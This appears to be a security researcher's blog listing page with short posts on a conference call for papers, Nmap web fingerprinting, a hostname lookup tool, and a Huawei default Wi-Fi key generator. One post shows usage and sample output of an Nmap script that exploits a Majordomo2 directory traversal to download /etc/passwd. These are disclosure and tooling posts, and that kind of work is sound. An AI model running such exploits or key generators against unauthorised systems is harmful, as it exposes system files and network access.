Web security

GuadalajaraCON: Call For Papers

by Paulino Calderon on Tue, Feb 14 2012 18:46:00
Ya salió el Call For Papers del GuadalajaraCON http://guadalajaracon.org . Aquí se los dejo para los que quieran compartir información en este evento. http://www.guadalajaracon.org/call-for-papers/
Posted in Web security | 15 Comments

Web pentesting with Nmap NSE

by Paulino Calderon on Thu, Dec 29 2011 04:31:00

A few months ago I submitted an article to Pentest Magazine called "Gathering web server information with Nmap NSE".

Pentest magazine extra coverExcerpt

HTTP response analysis with Nmap

Widely used protocols are always at the mercy of the
developers implementing it and HTTP is no exception.
Specially crafted requests make web servers behave in
its own way and this allow us to do some nifty tricks to
fingerprint them.

Posted in Nmap, Web security | 12 Comments

Exploiting Majordomo2 with Nmap

by Paulino Calderon on Tue, Jun 28 2011 18:42:00

This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it  Smile

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT STATE SERVICE 

  80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
| 
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.

 

Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse

Posted in Nmap, Code, Web security | 14 Comments

WhatAreMyHosts.com - IP to hostnames

by Paulino Calderon on Sat, Jun 04 2011 06:11:00

I created a small web application that uses Bing's results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don't abuse it ;) 

 http://whataremyhosts.com 

Posted in Web security, Code | Leave a comment

WEP/WPA key generator for Huawei gateways

by Paulino Calderon on Sat, Jan 22 2011 00:43:00

We are proud to release our WEP/WPA default key generator for Huawei HG520x and HG530 Gateways. These devices use a weak cipher to generate their default keys and Humberto Ochoa, one of our vulnerability researchers at Websec, did a great job deciphering the algorithm:

Mac2wepkey - WEP/WPA default key generator for Huawei HG250x and HG530 Gateways

Ironically, Prodigy Telmex, the biggest ISP in Mexico, just replaced my old 2wire router with one of these vulnerable modems, a newer and "better" device (According to their technician of course hehe). 

Posted in Code, Advisories, Web security | 16 Comments
1 | 2